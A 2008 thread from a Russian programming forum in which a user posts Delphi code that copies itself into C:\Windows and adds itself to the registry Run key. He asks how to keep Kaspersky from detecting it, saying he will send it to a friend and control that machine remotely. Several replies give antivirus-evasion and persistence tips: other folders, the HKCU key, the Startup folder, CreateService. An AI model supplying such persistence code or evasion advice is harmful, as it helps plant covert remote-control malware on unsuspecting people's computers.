Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Delphi программирование > Общие вопросы Delphi
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 10.04.2008, 13:16   #1
AngelOfDeath
Delphi/C++/Asm
Форумчанин Подтвердите свой е-майл
 
Аватар для AngelOfDeath
 
Регистрация: 28.03.2008
Сообщений: 358
Восклицание Что делать? Палит антивирус

Народ что делать? Как модифицировать этот код
Код:
unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, registry;

type
  TForm1 = class(TForm)
    procedure FormCreate(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;
  H: TRegistry;

implementation

{$R *.dfm}

procedure TForm1.FormCreate(Sender: TObject);
begin
H:=TRegistry.Create;
H.RootKey:=HKEY_LOCAL_MACHINE;

CopyFile(PChar(Application.ExeName),'C:\Windows\key.exe',  true);
H.OpenKey('\Software\Microsoft\Windows\CurrentVersion\Run', false);
H.WriteString('Proga_Shutka','C:\Windows\key.exe');
H.CloseKey;
H.Free;
end;

end.
Чтоб антивирус не принимал его за троян?
Стоит KIS 7
Планировал сделать программу шутку
Но касперский визжать начал
AngelOfDeath вне форума Ответить с цитированием
Старый 10.04.2008, 13:45   #2
Трофимов Александр
Форумчанин
 
Аватар для Трофимов Александр
 
Регистрация: 03.11.2006
Сообщений: 321
По умолчанию

Для начала попробуй копировать файл не в директорию Windows. Каспер за ней наблюдает.
Трофимов Александр вне форума Ответить с цитированием
Старый 10.04.2008, 13:50   #3
Stilet
Белик Виталий :)
Старожил
 
Аватар для Stilet
 
Регистрация: 23.07.2007
Сообщений: 57,097
По умолчанию

В Каспере настрой отключения палева твоей проги.
I'm learning to live...
Stilet вне форума Ответить с цитированием
Старый 10.04.2008, 13:55   #4
AngelOfDeath
Delphi/C++/Asm
Форумчанин Подтвердите свой е-майл
 
Аватар для AngelOfDeath
 
Регистрация: 28.03.2008
Сообщений: 358
По умолчанию

Цитата:
Для начала попробуй копировать файл не в директорию Windows. Каспер за ней наблюдает.
Где бы полуше запрятать мою прогу?))
Цитата:
В Каспере настрой отключения палева твоей проги.
Это же прога шутка я её отправлю другу
Она добавляется в автозапуск
И я могу делать ему перезагрузку и прочее через инет!

Ну немагу же я прийти к нему настроить антивирь уйти
И потом дать прогу

Последний раз редактировалось Stilet; 10.04.2008 в 14:12.
AngelOfDeath вне форума Ответить с цитированием
Старый 10.04.2008, 14:06   #5
Квэнди
Старожил
 
Аватар для Квэнди
 
Регистрация: 13.12.2006
Сообщений: 3,859
По умолчанию

не в системную папку как минимум её надо класть
ICQ не для вопросов, а для предложений. Для вопросов используйте форум
IRC канал клуба программистов|Мои статьи
Квэнди вне форума Ответить с цитированием
Старый 10.04.2008, 14:09   #6
AngelOfDeath
Delphi/C++/Asm
Форумчанин Подтвердите свой е-майл
 
Аватар для AngelOfDeath
 
Регистрация: 28.03.2008
Сообщений: 358
По умолчанию

Так с копированием разобрались
Что с регом делать?
AngelOfDeath вне форума Ответить с цитированием
Старый 10.04.2008, 14:13   #7
Stilet
Белик Виталий :)
Старожил
 
Аватар для Stilet
 
Регистрация: 23.07.2007
Сообщений: 57,097
По умолчанию

Да ничего, раз антивирь палит значит путевый антивирь )
А еще попробуй работать с HKU_CURRENT_USER
I'm learning to live...

Последний раз редактировалось Stilet; 10.04.2008 в 14:20.
Stilet вне форума Ответить с цитированием
Старый 10.04.2008, 14:15   #8
AngelOfDeath
Delphi/C++/Asm
Форумчанин Подтвердите свой е-майл
 
Аватар для AngelOfDeath
 
Регистрация: 28.03.2008
Сообщений: 358
По умолчанию

Вот что самое обидное что что у всех друзей стоит такой-же антивирь значит прога у них не запуститься
Но всё таки есть способ обойти защиту?
AngelOfDeath вне форума Ответить с цитированием
Старый 10.04.2008, 14:19   #9
B_N
Новичок
Джуниор
 
Регистрация: 18.01.2008
Сообщений: 1,720
По умолчанию

Могу дать пару наводок
Во-первых каспер не сечёт каталог "%userprofile%\Start Menu\Programs\Startup\"
Во-вторых он очень вяло (если не сказать никак) реагирует на функцию CreateService
B_N вне форума Ответить с цитированием
Старый 10.04.2008, 14:21   #10
AngelOfDeath
Delphi/C++/Asm
Форумчанин Подтвердите свой е-майл
 
Аватар для AngelOfDeath
 
Регистрация: 28.03.2008
Сообщений: 358
По умолчанию

Цитата:
Во-вторых он очень вяло (если не сказать никак) реагирует на функцию CreateService
Вот с этого момента поподробнее пожалуйста
Что это функция делает?
Куда её пихать?
И как использовать?
AngelOfDeath вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
какой антивирус юзаете??? Sandwich Безопасность, Шифрование 323 03.11.2020 10:35
Как удалить ХР антивирус? nesimon Безопасность, Шифрование 5 05.01.2010 01:36
Антивирус Касперского ERASERROR Софт 2 03.02.2008 16:24
лучший антивирус ГОСЕАН Свободное общение 9 29.12.2007 05:14